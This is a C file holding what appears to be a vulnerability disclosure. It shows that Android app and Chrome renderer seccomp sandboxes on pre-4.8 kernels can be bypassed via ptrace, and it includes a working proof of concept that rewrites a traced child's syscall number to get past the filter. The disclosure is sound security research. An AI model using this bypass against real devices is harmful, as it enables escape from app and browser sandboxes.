162 lines
No EOL
6.7 KiB
C
162 lines
No EOL
6.7 KiB
C
/*
|
||
The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents:
|
||
|
||
Before kernel 4.8, the seccomp check will not be run again
after the tracer is notified. (This means that, on older kernels,
seccomp-based sandboxes must not allow use of
ptrace(2)—even of other sandboxed processes—without extreme
care; ptracers can use this mechanism to escape from the seccomp
sandbox.)
|
||
|
||
Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace cannot be considered security boundaries.
|
||
|
||
|
||
The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace:
|
||
|
||
================
|
||
===== filter 0 (164 instructions) =====
|
||
0001 if arch == AARCH64: [true +2, false +0]
|
||
[...]
|
||
0010 if nr >= 0x00000069: [true +1, false +0]
|
||
0012 if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP
|
||
0023 ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo)
|
||
0011 if nr >= 0x00000068: [true +18, false +17] -> ret TRAP
|
||
0023 ret ALLOW (syscalls: nanosleep, getitimer, setitimer)
|
||
[...]
|
||
002a if nr >= 0x00000018: [true +7, false +0]
|
||
0032 if nr >= 0x00000021: [true +3, false +0]
|
||
0036 if nr >= 0x00000024: [true +1, false +0]
|
||
0038 if nr >= 0x00000028: [true +106, false +105] -> ret TRAP
|
||
00a2 ret ALLOW (syscalls: sync, kill, rename, mkdir)
|
||
0037 if nr >= 0x00000022: [true +107, false +106] -> ret TRAP
|
||
00a2 ret ALLOW (syscalls: access)
|
||
0033 if nr >= 0x0000001a: [true +1, false +0]
|
||
0035 if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP
|
||
00a2 ret ALLOW (syscalls: ptrace)
|
||
0034 if nr >= 0x00000019: [true +110, false +109] -> ret TRAP
|
||
00a2 ret ALLOW (syscalls: getuid)
|
||
[...]
|
||
================
|
||
|
||
The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace:
|
||
|
||
================
|
||
# Google Breakpad (crash reporter for Chrome) relies on ptrace
|
||
# functionality. Without the ability to ptrace, the crash reporter
|
||
# tool is broken.
|
||
# b/20150694
|
||
# https://code.google.com/p/chromium/issues/detail?id=475270
|
||
allow isolated_app self:process ptrace;
|
||
================
|
||
|
||
Chrome applies two extra layers of seccomp sandbox; but these also permit the use of clone and ptrace:
|
||
================
|
||
===== filter 1 (194 instructions) =====
|
||
0001 if arch == AARCH64: [true +2, false +0]
|
||
[...]
|
||
0002 if arch != ARM: [true +0, false +60] -> ret TRAP
|
||
[...]
|
||
0074 if nr >= 0x0000007a: [true +1, false +0]
|
||
0076 if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP
|
||
00c0 ret ALLOW (syscalls: uname)
|
||
0075 if nr >= 0x00000079: [true +75, false +74] -> ret TRAP
|
||
00c0 ret ALLOW (syscalls: fsync, sigreturn, clone)
|
||
[...]
|
||
004d if nr >= 0x0000001a: [true +1, false +0]
|
||
004f if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP
|
||
00c0 ret ALLOW (syscalls: ptrace)
|
||
[...]
|
||
===== filter 2 (449 instructions) =====
|
||
0001 if arch != ARM: [true +0, false +1] -> ret TRAP
|
||
[...]
|
||
00b6 if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid)
|
||
00b7 if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace)
|
||
01c0 ret TRAP
|
||
[...]
|
||
007f if nr >= 0x00000073: [true +0, false +5]
|
||
0080 if nr >= 0x00000076: [true +0, false +2]
|
||
0081 if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone)
|
||
[...]
|
||
================
|
||
|
||
Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process.
|
||
|
||
|
||
To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot):
|
||
|
||
================
|
||
*/
|
||
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
#include <unistd.h>
|
||
#include <err.h>
|
||
#include <signal.h>
|
||
#include <sys/ptrace.h>
|
||
#include <errno.h>
|
||
#include <sys/wait.h>
|
||
#include <sys/syscall.h>
|
||
#include <sys/user.h>
|
||
#include <linux/elf.h>
|
||
#include <asm/ptrace.h>
|
||
#include <sys/uio.h>
|
||
|
||
/*
 * Kill and reap the child, then exit with a diagnostic.
 *
 * The child spins forever in a syscall loop, so it must not be left running
 * when the parent gives up. A non-zero saved_errno produces an err(3)-style
 * message (msg plus the strerror text); zero produces an errx(3)-style
 * message (msg only).
 */
static void die_with_child(pid_t child, int saved_errno, const char *msg) {
  kill(child, SIGKILL);
  waitpid(child, NULL, 0);
  if (saved_errno != 0) {
    errno = saved_errno; /* kill()/waitpid() may have overwritten errno */
    err(1, "%s", msg);
  }
  errx(1, "%s", msg);
}

/*
 * Proof of concept: rewrite a traced child's syscall number after the
 * syscall-entry stop.
 *
 * The child calls gettid() in a tight loop and prints the result whenever it
 * differs from its own pid. The parent attaches with ptrace, runs the child
 * to its next syscall stop, checks that the pending syscall is gettid,
 * replaces the syscall number with swapon via the NT_ARM_SYSTEM_CALL regset,
 * and detaches. The child then reports the result of the substituted call.
 *
 * Returns 0 after the demonstration; exits with status 1 (after killing the
 * child) if any step in the parent fails.
 */
int main(void) {
  /* Unbuffered stdout so the child's output appears immediately. */
  setbuf(stdout, NULL);

  pid_t child = fork();
  if (child == -1) err(1, "fork");
  if (child == 0) {
    pid_t my_pid = getpid();
    while (1) {
      errno = 0;
      int res = syscall(__NR_gettid, 0, 0);
      /* Only a rewritten syscall makes the result differ from our pid. */
      if (res != my_pid) {
        printf("%d (%s)\n", res, strerror(errno));
      }
    }
  }

  /* Give the child time to enter its loop before attaching. */
  sleep(1);

  int status;

  if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) die_with_child(child, errno, "ptrace attach");
  if (waitpid(child, &status, 0) != child) die_with_child(child, errno, "wait for child");
  if (!WIFSTOPPED(status)) die_with_child(child, 0, "child did not stop after attach");

  /* Resume the child until its next syscall stop. */
  if (ptrace(PTRACE_SYSCALL, child, NULL, NULL)) die_with_child(child, errno, "ptrace syscall entry");
  if (waitpid(child, &status, 0) != child) die_with_child(child, errno, "wait for child");
  if (!WIFSTOPPED(status)) die_with_child(child, 0, "child did not stop at syscall");

  /* Read the pending syscall number through the regset interface. */
  int syscallno = -1;
  struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) };
  if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) die_with_child(child, errno, "ptrace getregs");
  printf("seeing syscall %d\n", syscallno);
  if (syscallno != __NR_gettid) die_with_child(child, 0, "not gettid");

  /* Substitute the syscall number while the child is still stopped. */
  syscallno = __NR_swapon;
  if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) die_with_child(child, errno, "ptrace setregs");

  if (ptrace(PTRACE_DETACH, child, NULL, NULL)) die_with_child(child, errno, "ptrace detach");
  kill(child, SIGCONT);

  /* Let the child run long enough to print its result, then clean up. */
  sleep(5);
  kill(child, SIGKILL);
  waitpid(child, NULL, 0);
  return 0;
}
|
||
|
||
/*
|
||
================
|
||
|
||
If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached.
|
||
|
||
For comparison, the following (a straight syscall to swapon()) fails with SIGSYS:
|
||
|
||
================
|
||
#include <unistd.h>
|
||
#include <sys/syscall.h>
|
||
int main(void) {
|
||
syscall(__NR_swapon, 0, 0);
|
||
}
|
||
================
|
||
|
||
Attaching screenshot from connectbot.
|
||
|
||
I believe that a sensible fix would be to backport the behavior change that occurred in kernel 4.8 to Android's stable branches.
|
||
*/ |